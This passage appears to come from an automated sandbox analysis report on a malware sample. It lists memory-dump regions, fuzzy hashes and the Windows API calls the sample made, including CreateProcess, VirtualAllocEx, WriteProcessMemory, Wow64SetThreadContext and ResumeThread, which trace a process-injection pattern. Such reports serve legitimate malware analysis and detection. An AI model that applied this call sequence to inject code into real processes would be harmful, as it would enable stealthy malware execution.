                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: T(z
                      • API String ID: 0-3184255237
                      • Opcode ID: dd2c8eed18aaac1b32aa466e3da6e580d5bc0415d8255ccf648c9a5027613313
                      • Instruction ID: 5889d66baf1830b9f7beb4c760b0c6dbeefe03222ef369eaa777f829260a3957
                      • Opcode Fuzzy Hash: dd2c8eed18aaac1b32aa466e3da6e580d5bc0415d8255ccf648c9a5027613313
                      • Instruction Fuzzy Hash: 92312BB5F35209CBDB588AB589517AFF6B7EBC9600F10C43AD612BB388CA709D418791
                      Memory Dump Source
                      • Source File: 00000000.00000002.1340906375.0000000005360000.00000040.00000800.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5360000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c380fd038b3c1e058765483e2e7b2f5f1c77b995cd22304305aee7e1e6af25c8
                      • Instruction ID: ca4376ec454bd915114a1842af0913a3916d3fbccac8630a6ae3a53608453787
                      • Opcode Fuzzy Hash: c380fd038b3c1e058765483e2e7b2f5f1c77b995cd22304305aee7e1e6af25c8
                      • Instruction Fuzzy Hash: 31525D34A00349CFCB14DF64C844BD9B7B2BF89314F2582A9D5596F3A2DB71A986CF81
                      Memory Dump Source
                      • Source File: 00000000.00000002.1340906375.0000000005360000.00000040.00000800.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5360000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ca7c1664a78224c359bcc89bb73980baad4054658137f017a630f2fac65917cd
                      • Instruction ID: f87bc4bdb6ab997a42e54535702137395358063b5958903b000f3c97f4a25329
                      • Opcode Fuzzy Hash: ca7c1664a78224c359bcc89bb73980baad4054658137f017a630f2fac65917cd
                      • Instruction Fuzzy Hash: 67525D34A00349CFDB14DF64C844BD9B7B2BF89314F2582A9D5586F3A2DB71A986CF81
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7862610738d8f1e00a47de84d45c049785d628afbfdbbd1e2fe22decd7beffc3
                      • Instruction ID: dbdf84a9f8ddf4fc0a560eaad7b1b0047458e5589e691bd64d00b758c0d34b78
                      • Opcode Fuzzy Hash: 7862610738d8f1e00a47de84d45c049785d628afbfdbbd1e2fe22decd7beffc3
                      • Instruction Fuzzy Hash: 7DC1D175B20205CFDB04DB78D8557AEBBF2BF89310F25846AE506EB3A1DA74DC418B90
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: db0702ce4bb0842cbbfa61e1c7a3d2ef9684a8bcbb640adf46a45f8274190fad
                      • Instruction ID: 8a7a0edac0bffa8686ef09378045e50190b84ef34d36425d48a52b96673b3a93
                      • Opcode Fuzzy Hash: db0702ce4bb0842cbbfa61e1c7a3d2ef9684a8bcbb640adf46a45f8274190fad
                      • Instruction Fuzzy Hash: 8DA157B2234159CFC7048B64D8905E9FBF5EB56320FA6587BDA02DF252D730DA55CB80
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 53a6bf7e9f934b7b95c880a90884a7d159953581d4554fb7112947917f73f3e1
                      • Instruction ID: 1db78565dc82145d70211e55d00dd391ae9d8b494ccf3748e95d49e2bc074ec4
                      • Opcode Fuzzy Hash: 53a6bf7e9f934b7b95c880a90884a7d159953581d4554fb7112947917f73f3e1
                      • Instruction Fuzzy Hash: 45A19E74B20209CFDB44DBB5D95976EBAF2BF88700F258429E906EB3A5DE74DC418B40
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7a31c24a6993fbdb221f164053729eee932e05202223d718603ad922bb912f61
                      • Instruction ID: 629b944682c1cca10b14283975a1158131daacffc24755a9b1cf4db4ddc43e4d
                      • Opcode Fuzzy Hash: 7a31c24a6993fbdb221f164053729eee932e05202223d718603ad922bb912f61
                      • Instruction Fuzzy Hash: A161EFB123414DCFC708CF29C99082ABBBAEB96300BD2886BDA06DB355D770ED55CB45
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ae80ec727241c0525bc71547af3845259617146ebf990827fd4487b947c3c4c8
                      • Instruction ID: 652dcf8c4dad58395adb2c31faefa57ba43425caee1f0abdbdd25ca7ca74b3c3
                      • Opcode Fuzzy Hash: ae80ec727241c0525bc71547af3845259617146ebf990827fd4487b947c3c4c8
                      • Instruction Fuzzy Hash: 9851C274B10209CFDB14DB74D85576EBAB3FF88300F209425EA06AB3A5CE79DC418B40
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3db8ba4dffa2ae870b79c2dbbfc04175140edd5c10827c3ab3fb640474c446e8
                      • Instruction ID: 1efc6eeb7aa6aface1d1c68d25ab0512f8f3ecc1a8fa8f3e650aadd20492b739
                      • Opcode Fuzzy Hash: 3db8ba4dffa2ae870b79c2dbbfc04175140edd5c10827c3ab3fb640474c446e8
                      • Instruction Fuzzy Hash: 5D419671B34119DFCB14CFA8C9409AEFBB6EF89210FA0457AE606EB350D671DD418B81
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2ce2da333abfe1c2d3815a704d8b8857a6a9485fdf2e85a2a1a4569cfff74cee
                      • Instruction ID: 29ba769a45aaf01c272b439954900c9f775a4afd9beafc86aef46de49ac1bf54
                      • Opcode Fuzzy Hash: 2ce2da333abfe1c2d3815a704d8b8857a6a9485fdf2e85a2a1a4569cfff74cee
                      • Instruction Fuzzy Hash: 7D41A775B34119DBCB14CFA8C9408AEFBB6EF89310FA0457AE60AEB350D671DD418781

                      APIs
                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02CD2556
                      Memory Dump Source
                      • Source File: 00000000.00000002.1329657168.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2cd0000_03.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: a34cd64e9e96cb035ee1c9974ece96df502f1fc71db004cc75f564f8139c712e
                      • Instruction ID: d602c129cd05f796ff65bf4707ca15d83a8e59fa3de380a0c675286dcde70868
                      • Opcode Fuzzy Hash: a34cd64e9e96cb035ee1c9974ece96df502f1fc71db004cc75f564f8139c712e
                      • Instruction Fuzzy Hash: 32A14A71D00319CFEB20CF68C8407EEBBB2AF84314F148569DD59A7241DB749A85CF92

                      APIs
                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02CD2556
                      Memory Dump Source
                      • Source File: 00000000.00000002.1329657168.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2cd0000_03.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: 061e3d5f6ab8596beb8a8d3c54dc42610f7e80799b44180d1d656d9112560461
                      • Instruction ID: 9095a2ed1ff1891e8e3435ed87766f372d5c20567c249b71b60d28f13a20aacd
                      • Opcode Fuzzy Hash: 061e3d5f6ab8596beb8a8d3c54dc42610f7e80799b44180d1d656d9112560461
                      • Instruction Fuzzy Hash: 90914971D00319CFEB20CF69C840BEEBBB2AF88314F148569DD19A7241DB749A85CF92

                      APIs
                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0105AFFE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1328667414.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1050000_03.jbxd
                      Similarity
                      • API ID: HandleModule
                      • String ID:
                      • API String ID: 4139908857-0
                      • Opcode ID: e045b8c2405c6efb91fdece285c72be533c22f9d8de68a8b0c153dcfcaa88bcf
                      • Instruction ID: d7a3137ca1c020c6b8d2d22e5e99353a8c87361c3dd5eae9398baa279213e641
                      • Opcode Fuzzy Hash: e045b8c2405c6efb91fdece285c72be533c22f9d8de68a8b0c153dcfcaa88bcf
                      • Instruction Fuzzy Hash: B5712370A00B05CFEBA4DF6AD44475BBBF5BF48304F008A2AD98A97A50DB75E845CB90

                      APIs
                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05361A02
                      Memory Dump Source
                      • Source File: 00000000.00000002.1340906375.0000000005360000.00000040.00000800.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5360000_03.jbxd
                      Similarity
                      • API ID: CreateWindow
                      • String ID:
                      • API String ID: 716092398-0
                      • Opcode ID: 2f49faa2af1f705382ab182e8a25bffae70ed6da09a84e1fd7cec6cd33b70b6b
                      • Instruction ID: 20aed42dbff6c6ee772d2e57a1135b4f984da67e59d2eddd2d900eab0ed51f67
                      • Opcode Fuzzy Hash: 2f49faa2af1f705382ab182e8a25bffae70ed6da09a84e1fd7cec6cd33b70b6b
                      • Instruction Fuzzy Hash: 7251C1B5D10349DFDB14CF99D984ADEBBB5BF48300F24812EE819AB214D7B49945CF90

                      APIs
                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05361A02
                      Memory Dump Source
                      • Source File: 00000000.00000002.1340906375.0000000005360000.00000040.00000800.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5360000_03.jbxd
                      Similarity
                      • API ID: CreateWindow
                      • String ID:
                      • API String ID: 716092398-0
                      • Opcode ID: 092834ed869f2a1b4814e779becc3a5a9158054483708a9443e3a4d1e248e433
                      • Instruction ID: 7d862215c6a04c9cd01b20c70e0ef7b3b4433adb107ca51240af773c763b1dfe
                      • Opcode Fuzzy Hash: 092834ed869f2a1b4814e779becc3a5a9158054483708a9443e3a4d1e248e433
                      • Instruction Fuzzy Hash: D041C1B5D10349DFDB14CF9AD884ADEBBB5BF48310F24812EE819AB214D7B0A945CF90

                      APIs
                      • CreateActCtxA.KERNEL32(?), ref: 010559C9
                      Memory Dump Source
                      • Source File: 00000000.00000002.1328667414.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1050000_03.jbxd
                      Similarity
                      • API ID: Create
                      • String ID:
                      • API String ID: 2289755597-0
                      • Opcode ID: 8c8715732f873cf3200b24db61bd3ffaf076631f301a170d296f460ef8ac73ff
                      • Instruction ID: 9b9e43be1000ae8ee68d3fadad5e6bec99878ea73e57bcd0f245e32064ab01b8
                      • Opcode Fuzzy Hash: 8c8715732f873cf3200b24db61bd3ffaf076631f301a170d296f460ef8ac73ff
                      • Instruction Fuzzy Hash: DF41D2B1C0071DCBEB24CFA9C884B8EBBF5BF49704F20846AD448AB251DB756949CF90

                      APIs
                      • CreateActCtxA.KERNEL32(?), ref: 010559C9
                      Memory Dump Source
                      • Source File: 00000000.00000002.1328667414.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1050000_03.jbxd
                      Similarity
                      • API ID: Create
                      • String ID:
                      • API String ID: 2289755597-0
                      • Opcode ID: 72caa53eb06aa37b526e29995c0f753d1d531bf60054631fd0c55865df624485
                      • Instruction ID: fba39f5e5130976e2c85d769c2e6066a754f42f6ef1267e093af89211364798a
                      • Opcode Fuzzy Hash: 72caa53eb06aa37b526e29995c0f753d1d531bf60054631fd0c55865df624485
                      • Instruction Fuzzy Hash: 1441E0B1C00719CFEB24CFA9C885B8EBBF5BF49704F20846AD448AB251DB756949CF50

                      APIs
                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 05364111
                      Memory Dump Source
                      • Source File: 00000000.00000002.1340906375.0000000005360000.00000040.00000800.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5360000_03.jbxd
                      Similarity
                      • API ID: CallProcWindow
                      • String ID:
                      • API String ID: 2714655100-0
                      • Opcode ID: da601171ec6cefe52478fad6634fea156902c19ad4d7a7f0f8472e7171515ebe
                      • Instruction ID: a716936d37e9f76635271ffa0d8da13083ebd25c5b04c084b64fa414f836e9be
                      • Opcode Fuzzy Hash: da601171ec6cefe52478fad6634fea156902c19ad4d7a7f0f8472e7171515ebe
                      • Instruction Fuzzy Hash: CC410AB9A00309CFDB14CF95C488AAABBF5FF88314F24C459D519A7365D775A841CFA0

                      APIs
                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02CD2208
                      Memory Dump Source
                      • Source File: 00000000.00000002.1329657168.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                      APIs
                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02CD2128
                      Memory Dump Source
                      • Source File: 00000000.00000002.1329657168.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                      APIs
                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02CD2046
                      Memory Dump Source
                      • Source File: 00000000.00000002.1329657168.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                      APIs
                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02CD1B46
                      Memory Dump Source
                      • Source File: 00000000.00000002.1329657168.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                      APIs
                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0105D646,?,?,?,?,?), ref: 0105D707
                      Memory Dump Source
                      • Source File: 00000000.00000002.1328667414.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                      APIs
                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0105B079,00000800,00000000,00000000), ref: 0105B28A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1328667414.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                      APIs
                      • ResumeThread.KERNELBASE(?), ref: 02CD1A7A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1329657168.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                      APIs
                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 02CD507D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1329657168.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                      APIs
                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0105AFFE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1328667414.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1050000_03.jbxd
                      Similarity
                      • API ID: HandleModule
                      • String ID:
                      • API String ID: 4139908857-0
                      • Opcode ID: e010b4b8028cb67bc6193c6a4ec1ff0024d477910a8f0bcb5f820c7a1b0a98eb
                      • Instruction ID: bc3196a17781a2a159de61ce3238a412206fbffe7db02df3894f846f6e937c26
                      • Opcode Fuzzy Hash: e010b4b8028cb67bc6193c6a4ec1ff0024d477910a8f0bcb5f820c7a1b0a98eb
                      • Instruction Fuzzy Hash: 61110FB6C002498FDB20CF9AD844B9EFBF4AB88214F10846AD969A7210D379A545CFA1
                      APIs
                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 02CD507D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1329657168.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2cd0000_03.jbxd
                      Similarity
                      • API ID: MessagePost
                      • String ID:
                      • API String ID: 410705778-0
                      • Opcode ID: 91e32cd8b777eec46f78acb79c634902dec0470084d609273aedb5344c0ed92b
                      • Instruction ID: a6c342d3de5abc8984d2818cc570bffa6e8a07aae18198443a87e10918da9ecd
                      • Opcode Fuzzy Hash: 91e32cd8b777eec46f78acb79c634902dec0470084d609273aedb5344c0ed92b
                      • Instruction Fuzzy Hash: 351103B5800349DFDB20CF9AD485BDEBFF4EB48310F10845AE959A3200C375A944CFA0
                      APIs
                      • ResumeThread.KERNELBASE(?), ref: 02CD1A7A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1329657168.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2cd0000_03.jbxd
                      Similarity
                      • API ID: ResumeThread
                      • String ID:
                      • API String ID: 947044025-0
                      • Opcode ID: d020091f2f6c89c0d38865d1daeeb096884601bac13b7077ae0374824adc4db4
                      • Instruction ID: fd037b9d0b10a2301a3d0a669e9d540d273f68ee76a13cfcb7458168428ed40e
                      • Opcode Fuzzy Hash: d020091f2f6c89c0d38865d1daeeb096884601bac13b7077ae0374824adc4db4
                      • Instruction Fuzzy Hash: 7C0104B18003498FEB24DFAAC5457AFBBF8AF49314F24841DD519A7244C7B8A684CBA5
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c3b40d1b728bff03dfacd00f72ee4893d22ea98f7cf1471ea3b8fca43b333e0a
                      • Instruction ID: f0c25e34ea938b4dbf632f00f85b313925bceb81bad8da62b301e7b5a45875a4
                      • Opcode Fuzzy Hash: c3b40d1b728bff03dfacd00f72ee4893d22ea98f7cf1471ea3b8fca43b333e0a
                      • Instruction Fuzzy Hash: 58B19F35314B00CFC305EB78D454AEABBF2EF8A310B1489AAD15A8B361DB30ED45CB91
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 50d984df1c2196c32c9af3862bb171e47f803a3cdaffdba21845543011fdca22
                      • Instruction ID: bddb27bb9c6c3daf3b647f88c4cdcd00732a126d6fc5ce0038bc8651c13dab2a
                      • Opcode Fuzzy Hash: 50d984df1c2196c32c9af3862bb171e47f803a3cdaffdba21845543011fdca22
                      • Instruction Fuzzy Hash: C7A17E35314B008FC315EB78D854AEABBF2EF89310B5489AED15A8B361DF31AD45CB91
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3ed5bf364ad9a059e58c96bc775114cd4a26aaa33a719e60aecbddf95ee11216
                      • Instruction ID: 1b9b991a0d4a766d59c60056488a84044ab6d4b7182f70ffa598309f33aded47
                      • Opcode Fuzzy Hash: 3ed5bf364ad9a059e58c96bc775114cd4a26aaa33a719e60aecbddf95ee11216
                      • Instruction Fuzzy Hash: 11916E35310B008FC305EB78D854AEAB7F2EF89311B5489AED15A8B361EF31AD45CB91
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: be7af91e9970f5cfd03c45bd2c84042c85d580a471cb3545dd97b884dd7dcf8b
                      • Instruction ID: 0bd9eb3dfe149656f92fb20b644a919209d2d839beb98db07dd9b85729083541
                      • Opcode Fuzzy Hash: be7af91e9970f5cfd03c45bd2c84042c85d580a471cb3545dd97b884dd7dcf8b
                      • Instruction Fuzzy Hash: 1A916175A002099FCB05DFA8D8809EEBBF5FF89300B14806AE904EB355EB35DD46CB91
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2b1882715ec8b6d36003e6e03c795f0397b842a5d898fd1cfac79ea40a168977
                      • Instruction ID: d0733691abd33cf28bc4850ac21f833aa666895853d345c17a92e56e57e9692c
                      • Opcode Fuzzy Hash: 2b1882715ec8b6d36003e6e03c795f0397b842a5d898fd1cfac79ea40a168977
                      • Instruction Fuzzy Hash: 8D812774310B048FC719EB78C894AAEB7E6EF89300B50896DD55A8B361EF31ED45CB91
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bc043ff5801b232828668a255258fe043fc6047fe0e24b84f809884782a030e0
                      • Instruction ID: c4d815a4603493c4e159ce77725fc2102180d83e919be1b7ecec3ac19ac5176a
                      • Opcode Fuzzy Hash: bc043ff5801b232828668a255258fe043fc6047fe0e24b84f809884782a030e0
                      • Instruction Fuzzy Hash: 89417F71B102068FDB14DBB9D858AAEBBF6EFC4320B148929E519D7395DF309D058790
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d06e5856fa79b6272149a441969e2f43bb0884c4d1d130e11021b0febf0f1a28
                      • Instruction ID: 5220c050b212b92ad2af136bc224af1277aa5ef6ce1378c0a25b1c8efbb52b4c
                      • Opcode Fuzzy Hash: d06e5856fa79b6272149a441969e2f43bb0884c4d1d130e11021b0febf0f1a28
                      • Instruction Fuzzy Hash: EC519034B502089FDB04DBB5D955B6EBBB3FF88700F249429EA06AB3A5DE75DC018B50
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 06572594e21c54d205a755f2861dcb6f2a081bfddabf984cae5c0a1f575f4b8c
                      • Instruction ID: 8ea7d714c23279ff72d697859341361b47bd69cc08b483ff4802d6c5b8920224
                      • Opcode Fuzzy Hash: 06572594e21c54d205a755f2861dcb6f2a081bfddabf984cae5c0a1f575f4b8c
                      • Instruction Fuzzy Hash: 3A51EFB4919284DFC306DB69E554A99BFF0EF8A200F2A84D6D484CB3B3C7749D19C712
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9f729594b7ab7140c55b9c71e644ae803a3779516d7328ad3c515ef55dd020a6
                      • Instruction ID: 46c800dcfb992bf4a7a7f9f3ff8f940f8b166526ad3b18c125fd9917af3d4636
                      • Opcode Fuzzy Hash: 9f729594b7ab7140c55b9c71e644ae803a3779516d7328ad3c515ef55dd020a6
                      • Instruction Fuzzy Hash: 4E419134B502089FDB049B75D955B6EBAB3FF88700F209469EA06AB3A5DE75DC018B50
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 69208b382907bc7091cb35e270950248a59948061229f20cf61c17f78855eb90
                      • Instruction ID: 9c924e7abb6143ca4274c92982e0b542a6a60be644aa985308e992bf8358b07d
                      • Opcode Fuzzy Hash: 69208b382907bc7091cb35e270950248a59948061229f20cf61c17f78855eb90
                      • Instruction Fuzzy Hash: B9414DF4E292198FDB08CBA9D4446EEFBF6EF8E301F149039E909A3255CB704941CB58
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7c85f162ed2bec2635ff60bbba75a69e6cdd49925f6459f46427d42114ec572f
                      • Instruction ID: 203b62244744de8141c8858bd320657a94177e3f79efb6bad3cea465b6c3f363
                      • Opcode Fuzzy Hash: 7c85f162ed2bec2635ff60bbba75a69e6cdd49925f6459f46427d42114ec572f
                      • Instruction Fuzzy Hash: C94126B497925ADFCB00EFA8D4849AEFBB4FB4E310F015965E61AA7311D7B09811CB60
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c55207f572fb3b2c6004189995fce961e6a1e32c7126e18b68bc0059c9ae12b6
                      • Instruction ID: d940a643bd60bd92c1437a0cc72e0dc72e286cceb0078cb4fef7f691565ab011
                      • Opcode Fuzzy Hash: c55207f572fb3b2c6004189995fce961e6a1e32c7126e18b68bc0059c9ae12b6
                      • Instruction Fuzzy Hash: 5841C6F4A24209CFDB04CFA9C584AEEF7F9BB89300F549165EA19A7351D7709941CF60
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 00d59b8d3129cc22c697f89e73a7f9bcf4d8bedb72d26609bd381bbce593fd58
                      • Instruction ID: ddffc3ec0ca7012e10369ed113e619032e0433137fa34e5e5b5f54eb3d03941d
                      • Opcode Fuzzy Hash: 00d59b8d3129cc22c697f89e73a7f9bcf4d8bedb72d26609bd381bbce593fd58
                      • Instruction Fuzzy Hash: 5A41E7B4D3925ADFCB00EFA8D4849AEFBB4FB4E310F415965E61AA7311D7B09810CB60
                      Memory Dump Source
